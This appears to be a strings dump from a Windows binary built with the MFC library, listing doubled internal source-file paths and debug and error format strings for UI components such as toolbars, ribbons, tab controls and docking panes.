f:\dd\vctools\vc7libs\ship\atlmfc\include\afxframeimpl.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoleipframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoleipframewndex.cpp
CMDIFrameWndEx
CMDIFrameWndEx
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdiframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdiframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxframewndex.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxframewndex.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp1.cpp
Warning: OleInitialize returned scode = %s.
Warning: OleInitialize returned scode = %s.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleinit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleinit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxvslistbox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxvslistbox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshelltreectrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshelltreectrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshelllistctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshelllistctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertygridctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertygridctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmaskededit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmaskededit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxlinkctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxlinkctrl.cpp
Can't open URL: %s
Can't open URL: %s
MFCLink_UrlPrefix
MFCLink_UrlPrefix
MFCLink_Url
MFCLink_Url
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxfontcombobox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxfontcombobox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxeditbrowsectrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxeditbrowsectrl.cpp
Can't load bitmap: %x
Can't load bitmap: %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbutton.cpp
Error: unknown image type '%u'
Error: unknown image type '%u'
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olefact.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olefact.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbardroptarget.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbardroptarget.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_o.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_o.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcontrolbarimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcontrolbarimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp
Can't load bitmap: %s. GetLastError() = %x
Can't load bitmap: %s. GetLastError() = %x
Can't load bitmap: %x. GetLastError() = %x
Can't load bitmap: %x. GetLastError() = %x
CMFCToolBarImages::CopyImageToClipboard error. Error code = %x
CMFCToolBarImages::CopyImageToClipboard error. Error code = %x
Can't create dialog: %s
Can't create dialog: %s
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasepane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasepane.cpp
DeferWindowPos failded, error code %d
DeferWindowPos failded, error code %d
%sBasePane-%d%x
%sBasePane-%d%x
%sBasePane-%d
%sBasePane-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpane.cpp
%sPane-%d%x
%sPane-%d%x
%sPane-%d
%sPane-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbutton.cpp
CMFCToolBarButton::CreateFromOleData. "Not Supported" exception
CMFCToolBarButton::CreateFromOleData. "Not Supported" exception
CMFCToolBarButton::CreateFromOleData. OLE exception: %x
CMFCToolBarButton::CreateFromOleData. OLE exception: %x
CMFCToolBarButton::PrepareDrag. OLE exception: %x
CMFCToolBarButton::PrepareDrag. OLE exception: %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomizebutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomizebutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtooltipmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtooltipmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtabctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtabctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtabctrl.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtabctrl.h
SetActiveTab: illegal tab number %d
SetActiveTab: illegal tab number %d
EnsureVisible: illegal tab number %d
EnsureVisible: illegal tab number %d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj2.cpp
m_stgMedium.tymed =
m_stgMedium.tymed =
m_formatEtc.tymed =
m_formatEtc.tymed =
m_formatEtc.lindex =
m_formatEtc.lindex =
m_formatEtc.dwAspect =
m_formatEtc.dwAspect =
m_formatEtc.pdt =
m_formatEtc.pdt =
m_formatEtc.cfFormat =
m_formatEtc.cfFormat =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop1.cpp
windows
windows
m_rectStartDrag.bottom =
m_rectStartDrag.bottom =
m_rectStartDrag.right =
m_rectStartDrag.right =
m_rectStartDrag.top =
m_rectStartDrag.top =
m_rectStartDrag.left =
m_rectStartDrag.left =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdropdowntoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdropdowntoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarmenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarmenubutton.cpp
CMFCToolBarMenuButton::CreateMenu(): Can't add menu item: %d
CMFCToolBarMenuButton::CreateMenu(): Can't add menu item: %d
Last error = %x
Last error = %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrackmouse.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrackmouse.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarmenubuttonsbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarmenubuttonsbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbarmenubuttonsbutton.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbarmenubuttonsbutton.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxwinappex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxwinappex.cpp
ShowCmd
ShowCmd
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsettingsstore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsettingsstore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxregpath.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxregpath.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdocksite.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdocksite.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbuttoncustomizedialog.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbuttoncustomizedialog.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmini.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmini.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsystemmenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsystemmenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbarsystemmenubutton.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbarsystemmenubutton.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn2.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn2.inl
Can't invoke command: %s
Can't invoke command: %s
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxusertool.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxusertool.cpp
Empty command in user-defined tool: %d
Empty command in user-defined tool: %d
CUserTool::CopyIconToClipboard error. Error code = %x
CUserTool::CopyIconToClipboard error. Error code = %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsound.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsound.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenubar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenubar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetabctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetabctrl.cpp
RemoveTab: illegal tab number %d
RemoveTab: illegal tab number %d
ShowTab: illegal tab number %d
ShowTab: illegal tab number %d
IsTabVisible: illegal tab number %d
IsTabVisible: illegal tab number %d
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxdockablepane.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxdockablepane.h
CMFCTabCtrl::SetImageList Can't load bitmap: %x
CMFCTabCtrl::SetImageList Can't load bitmap: %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxframeimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxframeimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\tooltip.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\tooltip.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockingpanesrow.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockingpanesrow.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarscustomizedialog.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarscustomizedialog.cpp
@f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdrawmanager.cpp
@f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdrawmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbaseribbonelement.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbaseribbonelement.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxbaseribbonelement.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxbaseribbonelement.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcontrolrenderer.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcontrolrenderer.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsmenupropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsmenupropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonminitoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonminitoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomizemenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomizemenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshowallbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshowallbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenutearoffmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenutearoffmanager.cpp
%c%d%c%s
%c%d%c%s
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpout.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpout.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fixalloc.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fixalloc.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgclr.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgclr.cpp
m_cc.lpCustColors
m_cc.lpCustColors
m_cc.Flags =
m_cc.Flags =
m_cc.rgbResult =
m_cc.rgbResult =
m_cc.hwndOwner =
m_cc.hwndOwner =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\ccdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\ccdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bardock.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bardock.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidebar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidebar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidedocksite.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidedocksite.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxglobalutils.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxglobalutils.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockablepane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockablepane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetabbedpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetabbedpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanedivider.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanedivider.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmultipaneframewnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmultipaneframewnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanecontainer.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanecontainer.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtabbedpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtabbedpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtabbedpane.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtabbedpane.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidebutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidebutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanecontainermanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanecontainermanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbar.cpp
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%sMFCOutlookBar-%d
?CMDIChildWnd
?CMDIChildWnd
CMDIFrameWnd
CMDIFrameWnd
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmdi.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmdi.cpp
Warning: CMDIFrameWnd::OnCreateClient: failed to create MDICLIENT. GetLastError returns 0x%8.8X
Warning: CMDIFrameWnd::OnCreateClient: failed to create MDICLIENT. GetLastError returns 0x%8.8X
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbartabctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbartabctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxoutlookbartabctrl.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxoutlookbartabctrl.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorbar.cpp
Hex={X,X,X}
Hex={X,X,X}
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpanelmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpanelmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtaskspaneframewnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtaskspaneframewnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonquickaccesstoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonquickaccesstoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribboncategory.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribboncategory.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpanel.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpanel.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonedit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonedit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpalettegallery.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpalettegallery.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxribbonpalettegallery.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxribbonpalettegallery.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcaptionbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcaptionbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpanebutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpanebutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxacceleratorkey.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxacceleratorkey.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdragframeimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdragframeimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockingmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockingmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxolecntrframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxolecntrframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcaptionmenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcaptionmenubutton.cpp
CMDIClientAreaWnd
CMDIClientAreaWnd
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdiclientareawnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdiclientareawnd.cpp
CMDIClientAreaWnd::OnCreate: can't create tabs window
CMDIClientAreaWnd::OnCreate: can't create tabs window
Unknown exception in CMDIClientAreaWnd::SaveState()!
Unknown exception in CMDIClientAreaWnd::SaveState()!
CArchiveException exception in CMDIClientAreaWnd::SaveState()!
CArchiveException exception in CMDIClientAreaWnd::SaveState()!
Memory exception in CMDIClientAreaWnd::SaveState()!
Memory exception in CMDIClientAreaWnd::SaveState()!
%sMDIClientArea-%d
%sMDIClientArea-%d
Unknown exception in CMDIClientAreaWnd::LoadState()!
Unknown exception in CMDIClientAreaWnd::LoadState()!
CArchiveException exception in CMDIClientAreaWnd::LoadState()!
CArchiveException exception in CMDIClientAreaWnd::LoadState()!
Memory exception in CMDIClientAreaWnd::LoadState!
Memory exception in CMDIClientAreaWnd::LoadState!
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledoc1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledoc1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpreviewviewex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpreviewviewex.cpp
Malformed Page Description string. Could not get string %d.
Malformed Page Description string. Could not get string %d.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxfullscreenimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxfullscreenimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledocip.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledocip.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemsgf.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemsgf.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occlock.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occlock.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxlistctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxlistctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarcomboboxbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarcomboboxbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxspinbuttonctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxspinbuttonctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpopupmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpopupmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertygridtooltipctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertygridtooltipctrl.cpp
?f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxheaderctrl.cpp
?f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxheaderctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarfontcombobox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarfontcombobox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
may cause RIPs under debug Windows.
may cause RIPs under debug Windows.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmt.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmt.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin3.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin3.inl
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockablepaneadapter.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockablepaneadapter.cpp
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
%sDockablePaneAdapter-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxrecentdocksiteinfo.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxrecentdocksiteinfo.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fileshrd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fileshrd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtooltipctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtooltipctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmousemanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmousemanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dockstat.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dockstat.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbuttonslistbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbuttonslistbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximageeditordialog.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximageeditordialog.cpp
CMFCImageEditorDialog::Copy() error. Error code = %x
CMFCImageEditorDialog::Copy() error. Error code = %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximagepaintarea.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximagepaintarea.cpp
CMFCToolBarsKeyboardPropertyPage
CMFCToolBarsKeyboardPropertyPage
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarskeyboardpropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarskeyboardpropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarslistpropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarslistpropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsoptionspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsoptionspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarstoolspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarstoolspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmousepropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmousepropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonkeytip.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonkeytip.cpp
faulted while dumping object at $%p, %u bytes long
